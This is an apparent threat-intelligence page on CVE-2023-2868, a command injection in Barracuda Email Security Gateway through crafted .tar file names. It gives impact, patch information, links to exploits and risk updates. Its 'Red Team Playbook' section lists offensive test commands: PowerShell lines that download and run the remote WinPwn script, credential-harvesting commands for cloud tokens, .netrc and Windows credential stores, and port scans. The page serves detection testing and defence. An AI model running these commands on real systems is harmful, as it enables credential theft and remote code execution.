CVE-2023-2868
Overview
This vulnerability is a remote command injection caused by improper input validation of user-supplied .tar archive file names in the Barracuda Email Security Gateway appliance firmware versions 5.1.3.001 through 9.2.0.006. The flaw resides in the parsing logic that fails to sanitize file names within the .tar archive, enabling execution of system commands via Perl's qx operator. The affected component is the archive processing functionality of the Email Security Gateway appliance.
Vulnerability Description
A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product effecting versions 5.1.3.001-9.2.0.006. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of BNSF-36456 patch. This patch was automatically applied to all customer appliances.
Impact
An unauthenticated remote attacker can execute arbitrary system commands on the affected Barracuda Email Security Gateway appliance by delivering a malicious .tar archive with crafted file names. This grants the attacker the ability to run commands with the same privileges as the Email Security Gateway software, potentially leading to full system compromise, data exposure, or disruption of email security services. The exploit requires no user interaction or credentials, enabling remote takeover of vulnerable appliances.
Solution
Barracuda Networks issued patch BNSF-36456 to remediate this vulnerability in Email Security Gateway appliance firmware versions 5.1.3.001 through 9.2.0.006. This patch is automatically applied to all customer appliances. For detailed patch instructions and status updates, refer to Barracuda's official advisory at https://www.barracuda.com/company/legal/esg-vulnerability and https://status.barracuda.com/incidents/34kx82j5n4q9.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the Barracuda Email Security Gateway, specifically affecting its appliance form factor across multiple firmware versions. This issue arises from inadequate sanitization during the processing of .tar files, which are commonly used for file archiving. The vulnerability allows for incomplete input validation of user-supplied .tar files, particularly concerning the names of the files contained within these archives. An attacker can exploit this flaw by crafting malicious file names that, when processed, can lead to the execution of arbitrary system commands via Perl's qx operator. This execution occurs with the privileges of the Email Security Gateway, potentially granting the attacker significant control over the affected system.
The attack vector for this vulnerability is primarily remote, allowing an attacker to exploit the system without needing physical access. By submitting a specially crafted .tar file through the appropriate interface, an attacker can manipulate the file names in such a way that they trigger command execution on the server. This could be done through various means, such as phishing emails that contain the malicious archive or through compromised accounts that have legitimate access to the system. The exploitation of this vulnerability could lead to a wide range of malicious activities, including data exfiltration, unauthorized access to sensitive information, or even the complete takeover of the affected appliance.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the Barracuda Email Security Gateway for their email security needs. The potential for remote command execution poses a severe business risk, as it could lead to data breaches, loss of sensitive information, and disruption of services. Organizations may face reputational damage, regulatory penalties, and financial losses as a result of a successful attack. Additionally, the presence of such a vulnerability could undermine customer trust, especially if the breach results in the exposure of personal or confidential data.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching the Barracuda Email Security Gateway is crucial, as the vendor has already released a patch to address this issue. Organizations should also conduct routine security assessments and vulnerability scans to identify any potential weaknesses in their systems. Employing intrusion detection systems (IDS) can help monitor for unusual activity that may indicate an attempted exploitation of this vulnerability. Furthermore, educating employees about safe email practices and the risks associated with opening attachments from untrusted sources can significantly reduce the likelihood of successful exploitation.
In conclusion, the remote command injection vulnerability in the Barracuda Email Security Gateway presents a serious threat to organizations utilizing this product. The potential for exploitation through crafted .tar files underscores the importance of robust input validation and security practices. By understanding the technical details of the vulnerability, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar threats in the future.
Recent updates to CVE-2023-2868 reveal a slight downward revision of its CVSS score from 9.8 to 9.4, reflecting a nuanced reassessment of its exploitability and impact. Concurrently, CSURFACE threat intelligence reports a significant reduction in detection activity related to this vulnerability, suggesting either a decline in active exploitation attempts or improved defensive postures among affected organizations. Despite this, the Exploit Prediction Scoring System (EPSS) score has marginally increased, indicating a modest rise in the likelihood of exploitation in the near term. Notably, publicly available proof-of-concept exploits remain limited, with no new repositories emerging, although a Metasploit module continues to provide a functional exploitation framework. This dynamic underscores a complex threat landscape where active exploitation pressure has eased, yet the vulnerability retains a critical risk profile due to its remote command injection nature and the availability of reliable exploit tools. For defenders, this means vigilance remains essential, as the vulnerability’s critical severity and persistent exploitability maintain a high threat level, even amid reduced observed activity. The updated risk assessment thus balances the observed decline in exploitation telemetry against the sustained potential for impactful compromise, affirming the need for continued monitoring and remediation efforts.
Update 2 — July 07, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-2868, accompanied by an upward revision of the CVSS score to 9.8, reflecting a heightened criticality of this remote command injection vulnerability. This increase in observed activity signals a resurgence of attacker interest, likely driven by the availability of a mature Metasploit module that facilitates reliable exploitation through crafted TAR file attachments. Although the Exploit Prediction Scoring System (EPSS) remains stable, the surge in telemetry underscores an elevated operational threat, emphasizing that adversaries are actively leveraging the vulnerability’s incomplete input validation to achieve remote code execution on Barracuda Email Security Gateway appliances. For defenders, this development highlights an increased likelihood of targeted attacks exploiting this vector, necessitating sustained vigilance despite previously observed easing in exploitation pressure. The updated risk assessment thus elevates the threat level to reflect both the intensifying exploitation activity and the critical impact potential inherent to this vulnerability, reinforcing its status as a high-priority concern within enterprise email security environments.
Update 3 — July 16, 2026
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting CVE-2023-2868, reflecting a clear uptick in attacker activity against vulnerable Barracuda Email Security Gateway appliances. This increase in telemetry signals heightened adversary interest and operational tempo, underscoring the vulnerability’s attractiveness as a remote command injection vector. Although the Exploit Prediction Scoring System (EPSS) remains stable, the observed escalation in real-world exploitation attempts elevates the immediacy of the threat. The availability of a Metasploit module further lowers the barrier for threat actors to weaponize this flaw, potentially broadening the attacker base beyond highly skilled operators. Consequently, the risk posture for organizations running affected Barracuda ESG firmware has intensified, warranting elevated prioritization within security monitoring and incident response frameworks. This development reinforces the criticality of this vulnerability as a persistent and actively exploited threat within enterprise email security environments.
Update 4 — August 01, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-2868, with telemetry indicating a substantial increase in malicious activity leveraging this vulnerability. The EPSS score has inched upward, reflecting growing confidence in the exploitability and likelihood of successful attacks. Notably, the availability and refinement of a Metasploit module continue to lower the technical barrier for threat actors, facilitating broader adoption of this exploit beyond highly skilled adversaries. This surge in activity underscores an elevated risk environment for organizations running vulnerable versions of the Barracuda Email Security Gateway appliance, as attackers increasingly weaponize crafted TAR file attachments to achieve remote command execution. The evolving threat landscape demands heightened vigilance, as the combination of rising exploitation attempts and accessible tooling significantly amplifies the potential impact and reach of this critical vulnerability.
Update 5 — August 19, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-2868, reflecting a modest uptick in attacker activity against vulnerable Barracuda Email Security Gateway appliances. While the overall exploit trend remains stable, the availability of a Metasploit module continues to lower the technical barrier for adversaries, enabling a broader range of threat actors to weaponize this remote command injection vulnerability. Our telemetry indicates that attackers persist in leveraging crafted TAR file attachments containing shell metacharacters to achieve remote code execution, sustaining pressure on affected environments. Although ransomware involvement remains unconfirmed, the persistent exploitation attempts underscore an ongoing risk that could facilitate further compromise or lateral movement within targeted networks. This development maintains the critical threat level, emphasizing the need for continued monitoring as exploitation remains active and accessible through publicly available tooling.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Barracuda | Email Security Gateway 300 Firmware | All |
cpe:2.3:o:barracuda:email_security_gateway_300_firmware:*:*:*:*:*:*:*:*
|
|
|
Barracuda | Email Security Gateway 400 Firmware | All |
cpe:2.3:o:barracuda:email_security_gateway_400_firmware:*:*:*:*:*:*:*:*
|
|
|
Barracuda | Email Security Gateway 600 Firmware | All |
cpe:2.3:o:barracuda:email_security_gateway_600_firmware:*:*:*:*:*:*:*:*
|
|
|
Barracuda | Email Security Gateway 800 Firmware | All |
cpe:2.3:o:barracuda:email_security_gateway_800_firmware:*:*:*:*:*:*:*:*
|
|
|
Barracuda | Email Security Gateway 900 Firmware | All |
cpe:2.3:o:barracuda:email_security_gateway_900_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Barracuda ESG TAR Filename Command Injection
exploits/linux/smtp/barracuda_esg_tarfile_rce
|
Mandiant, cfielding-r7, Curt Hyvarinen | Unknown | - | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
cfielding-r7/poc-cve-2023-2868
|
cfielding-r7 | 11 | 6 | 2023-06-20 | View |
|
cashapp323232/CVE-2023-2868CVE-2023-2868
|
cashapp323232 | 0 | 0 | 2023-07-30 | View |
|
krmxd/CVE-2023-2868
|
krmxd | 0 | 0 | 2023-08-25 | View |
Threat Feed
23 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-2868 |
| barracuda.com |
GitHub CVE
|
https://www.barracuda.com/company/legal/esg-vulnerability |
| status.barracuda.com |
GitHub CVE
|
https://status.barracuda.com/incidents/34kx82j5n4q9 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-2868 |